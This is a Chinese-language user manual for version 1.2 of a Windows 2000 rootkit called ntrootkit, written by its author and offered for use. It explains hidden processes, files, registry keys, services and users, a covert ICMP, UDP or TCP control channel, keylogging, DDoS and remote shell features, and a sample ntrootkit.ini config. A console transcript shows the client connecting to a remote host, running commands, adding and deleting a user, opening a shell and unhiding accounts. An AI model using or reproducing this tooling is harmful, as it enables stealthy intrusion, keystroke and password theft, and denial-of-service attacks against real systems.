一、简介
   本ntrootkit采用无连接协议，不开端口，有四种协议可以选择(0:userdefined,1:icmp,2:udp,3:tcp)，注意第三种
方式，它只是使用了tcp数据包进行通讯，并没有建立tcp连接，用这种方式只要把目标端口设置成任意一个目标机器上
开的端口，一般都会成功的机会很大。它隐藏进程，文件，目录，服务，注册表项和用户，提供一些很有用的命令。由
于该rootkit有ddos功能，请不要公开传播！如果已经安装了ntrootkit 1.0，必须用'-i'选项升级，重起系统后生效。

  ntrootkit 1.1版增加了远程安装，ddos，键盘记录功能，该版本不公开，需要的可向我要。

  ntrootkit 1.2版相对于1.1版做了如下改进：

1.修改不能进行键盘记录的bug
2.增加隐藏用户的命令
3.增加system命令，可以在不开命令行窗口的情况下执行外部命令，用system函数运行命令时会弹出命令行窗口，
因此改为用winexec执行，而这个函数不能执行系统内部命令，如dir等。
4.增加配置文件，可以自己配置rootkit，在下面有详细说明
5.隐藏的东西在3389终端中也看不到，注意：用hide系列命令添加的隐藏项在3389终端中不会马上被隐藏，而是在
重新连接终端后隐藏，在配置文件中添加的隐藏项在3389终端中安装完rootkit就能隐藏。
6.增加getsysinfo 命令，可以得到远程机器的一些基本信息
7.增加用fport也看不到被隐藏进程及其开的端口的功能
8.连接密码和网络通讯都进行加密
9.连接异常退出后不需要等几分钟，可以马上连接，但是客户端的ip和连接类型不能改变。

二、使用环境
   Windows 2000系列操作系统（包括客户端和服务器端）
三、使用步骤

使用步骤和以前的版本相同，下面主要对rootkit的配置文件进行说明：

如果机器上已经安装了以前版本的ntrootkit，可以用'-i'选项进行升级，这时配置文件的内容不会起作用，
使用的是已经安装rootkit的设置，也可以先卸载，重启机器，再安装新版本。

1.配置文件名为ntrootkit.ini
2.配置文件在安装rootkit时必须放在和rootkit的安装文件同一个目录，包括本地和远程安装,当找不到配置文件时，
会以默认设置安装rootkit
3.在本地安装时，安装成功后会自动删除配置文件，远程安装则不会。

下面以一个例子对配置文件的各个部分进行解释：

\\filename:ntrootkit.ini
\\This is the init file of yyt_hac's ntrootkit,please modify it correctly or the rootkit
\\can't be installed!!!
[GLOBAL]
\\servicename is the ntrootkit 's servicename
servicename=tsserver
installdir=com\sserver
connpass=yyt_hac111
keylog=0
workmode=1
[HIDDEN PROCNAME]
test.exe
aaa aaa.exe
[HIDDEN REGKEY]
hklm\software\aaa aaa\
hklm\aaa*
aaaa*
[HIDDEN REGVALUE]
hklm\software\aaa
[HIDDEN FILEDIR]
c:\dell
[HIDDEN SERVICE]
alter
test service
[HIDDEN USER]
yyt_hac

1.以\\开头是注释行
2.[GLOBAL]下面是rootkit的一些基本设置
  a.servicename是rootkit安装后的服务名
  b.installdir是rootkit的安装后所在的目录，它相对于系统目录(%System%)，注意，rootkit只会创建一层目录，
以上例子安装目录为com\sserver，com目录在系统目录下是存在的，rootkit只会创建sserver目录，如果com目录
不存在，安装就会失败。
  c.connpass是连接密码，也是卸载和升级时要用的密码。
  d.keylog为0，表示不进行键盘记录，为1表示进行键盘记录。
  e.workmode为0表示用sniffer方式，为1表示用网络驱动程序收发数据包，建议用1。
3.[HIDDEN PROCNAME]下面是一些需要隐藏的进程名,最好不要用空格
4.[HIDDEN REGKEY]下面是一些需要隐藏的注册表键
5.[HIDDEN REGVALUE]下面是一些需要隐藏的注册表键值
6.[HIDDEN FILEDIR]下面是一些需要隐藏的文件和目录名
7.[HIDDEN SERVICE]下面是一些需要隐藏的服务名
8.[HIDDEN USER]下面是一些需要隐藏的用户名

一些新功能的演示
F:\public>rtclient 192.8.8.66 -p yyt_hac111
It is yyt_hac's ntrootkit client 1.2
Welcome to

Getting ip address of the computer...
1.         10.144.48.*
2.         192.8.8.*
Please Select the number of the ip
address you want to use to send and recv packet:2
Please select proto(0:userdefined,1:icmp,2:udp,3:tcp):3
Welcome to yyt_hac's ntrootkit Server 1.2 public version,use '?' command
to get command list
CMD>?
********yyt_hac's ntrootkit Server Command List********
?-------------------------------Show this list
HideFileDir [FileName or DIR]----------------------Hide the file or directory(
para will show all file or directory been hidden)
HideProcId [pid]----------------Hide process with the id
HideProcName [procname]---------Hide process with the process name
HideKey [KeyName]---------------Hide the registry key
HideValue [ValueName]-----------Hide the registry value
HideUser [UserName]-------------Hide the User
HideServ [ServiceName]----------Hide the Service
ShowFileDir FileName or DIR-----UnHide the file or directory that been hidden
fore
ShowProcId pid------------------UnHide the process that been hidden before wit
the id
ShowProcName procname-----------UnHide the process that been hidden before wit
the process name
ShowKey KeyName-----------------UnHide the registry key
ShowValue ValueName-------------UnHide the registry value
ShowUser UserName---------------UnHide the user that been hidden before
ShowServ ServiceName------------UnHide the service that been hidden before
Get RemoteFilePath [LocalFilePath]----Get the remote file to local computer
Put LocalFilePath [RemoteFilePath]----Put the local file to remote computer
KeyLogOn------------------------------Start key log
KeyLogOff-----------------------------Stop key log
DDOS DDos_Destip [DDos_Destport DDos_type DDos_seconds DDos_ProcCount]---DDos
e destip
SDDOS---------------------------------Stop DDos
GetPwd [LocalFilePath]----------------Get the ntrootkit keylog password file t
local computer
DelPwd--------------------------------Del the ntrootkit keylog password file
Ps------------------------------------Show all processes on remote machine
Kill pid------------------------------Kill the process with the id or name
RTVer---------------------------------Show Ntrootkit server version and author
nfo
SetPass [NewPassword]-----------------Change or show the connection password
Reboot--------------------------------Reboot the targer computer
OpenShell-----------------------------Open a command shell
system command------------------------excute command use system fuction
getsysinfo----------------------------get remote system infomation
Exit----------------------------------Exit the shell or rootkit
CMD>hideuser
The Hide User:
GUEST

CMD>system net user yyt_hac /add
command excute successfully!
CMD>system net user yyt_hac /del
command excute successfully!
CMD>getsysinfo
Number of CPU:1
Type of CPU:Intel  Pentium III or high
System Version:Windows nt 5.0 build:2195
Service Pack:3.0
Product type:Windows 2000 Server
Computer Name:YYTHAC
System Dir:C:\WINNT\system32
CMD>openshell
Microsoft Windows 2000 [Version 5.00.2195]
(C) 版权所有 1985-2000 Microsoft Corp.

C:\WINNT\system32>cd \
cd \

C:\>net user
net user

\\ 的用户帐户

------------------------------------------------------------------------------
__vmware_user__          ACTUser                  ASPNET
IUSR_EIS-ZH              IWAM_EIS-ZH              root
SQLAgentCmdExec          SQLDebugger              TsInternetUser
VUSR_EIS-ZH              VUSR_YYT_HAC
命令运行完毕，但发生一个或多个错误。


C:\>showuser guest
ShowUser:successfully

C:\>net user
net user

\\ 的用户帐户

------------------------------------------------------------------------------
__vmware_user__          ACTUser                  ASPNET
Guest                    IUSR_EIS-ZH              IWAM_EIS-ZH
root                     SQLAgentCmdExec          SQLDebugger
TsInternetUser           VUSR_EIS-ZH              VUSR_YYT_HAC
命令运行完毕，但发生一个或多个错误。


C:\>exit
CMD>^C //异常退出
F:\public>rtclient 192.8.8.66 -p yyt_hac111  //继续上一个连接
It is yyt_hac's ntrootkit client 1.2
Welcome to

Getting ip address of the computer...
1.         10.144.48.*
2.         192.8.8.*
Please Select the number of the ip
address you want to use to send and recv packet:2
Please select proto(0:userdefined,1:icmp,2:udp,3:tcp):3
continue session 21137

CON>getsysinfo
Number of CPU:1
Type of CPU:Intel  Pentium III or high
System Version:Windows nt 5.0 build:2195
Service Pack:3.0
Product type:Windows 2000 Server
Computer Name:YYTHAC
System Dir:C:\WINNT\system32
CMD>exit
exit successfully

bye bye

F:\public>